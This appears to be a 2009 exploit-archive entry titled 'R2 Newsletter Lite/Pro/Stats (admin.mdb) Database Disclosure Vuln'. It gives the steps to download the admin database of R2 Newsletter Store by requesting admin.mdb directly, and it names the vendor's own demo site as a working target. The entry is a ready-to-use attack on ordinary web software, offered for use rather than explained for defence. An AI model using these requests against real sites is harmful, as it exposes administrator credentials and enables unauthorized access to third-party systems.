id: 5288
date: 05/31/2009
title: R2 Newsletter Lite/Pro/Stats (admin.mdb) Database Disclosure Vuln
author: TiGeR-Dz
cves: 

=================================================================
R2 Newsletter Lite/Pro/Stats (admin.mdb) Database Disclosure Vuln
=================================================================


 ---------------------------------------------------------------
R2 Newsletter Store (admin.mdb) Remote Admin Disclosure
 Vulnerability
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:http:/www.r2newsletter.com
 Script:R2 Newsletter Store 
 Download:http://www.r2newsletter.com/shop/store/dynamicIndex.asp
 ---------------------------------------------------------------
 Exploit:
 -------

 http://www.site.com/[script]/admin.asp

 go to 

http://www.site.com/[script]/admin.mdb
 --------------------------------------
 ----------------------------------------------------------------
 Dem0
 ----
 http://www.r2newsletter.com/statsdemo/admin.asp

 go to 

 http://www.r2newsletter.com/statsdemo/admin.mdb 

 --------------------------------------



#  0day.today [2023-03-25]  #